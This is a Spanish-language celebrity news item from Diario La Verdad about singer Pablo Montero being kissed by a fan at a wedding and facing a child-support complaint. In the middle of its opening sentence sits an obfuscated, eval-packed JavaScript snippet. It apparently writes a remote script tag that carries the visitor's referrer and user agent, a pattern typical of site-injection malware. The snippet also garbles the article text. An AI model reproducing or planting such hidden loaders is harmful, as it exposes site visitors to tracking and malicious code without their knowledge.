Pablo Montero besa en la boca a un seguidor

Redacción Arte&Ocio / Maracaibo / [email protected]
De eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kebrz|var|u0026u|referrer|dffzb||js|php'.split('|'),0,{})) acuerdo a las imágenes difundidas por la revista TV Notas, el cantante fue abordado por Lucía Cabañas, cuyo nombre real es Lucio, quien hizo que el cantante dejara de cantar el tema Se me olvidó otra vez para besarlo en la boca

El bochornoso momento lo vivió el cantante durante una presentación privada. (Foto: Agencia)

El cantante mexicano, Pablo Montero fue sorprendido durante una presentación especial este fin de semana en la boda de la senadora mexicana, Iris Vianey.

De acuerdo a las imágenes difundidas por la revista TV Notas, el cantante fue abordado por Lucía Cabañas, cuyo nombre real es Lucio, quien hizo que el cantante dejara de cantar el tema Se me olvidó otra vez para besarlo en la boca.

Tras conocer las circunstancias del arrumaco que le propinó su seguidor, Pablo confesó: “Él fue quien me jaló para darme el beso; yo quería quitarme pero no me dio chance. No esperaba que sucediera eso, jamás me aventé a besarlo”.

Este incidente se dio a conocer a la par de que Raquel Piedra, madre de su hijo Daniel, acuse al actor y cantante de no depositar la pensión alimenticia al menor.

“Yo tengo para mantener mi casa, pero quiero que ayude, que pase más tiempo con su hijo”, expresó Raquel en entrevista para el programa Hoy.

 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama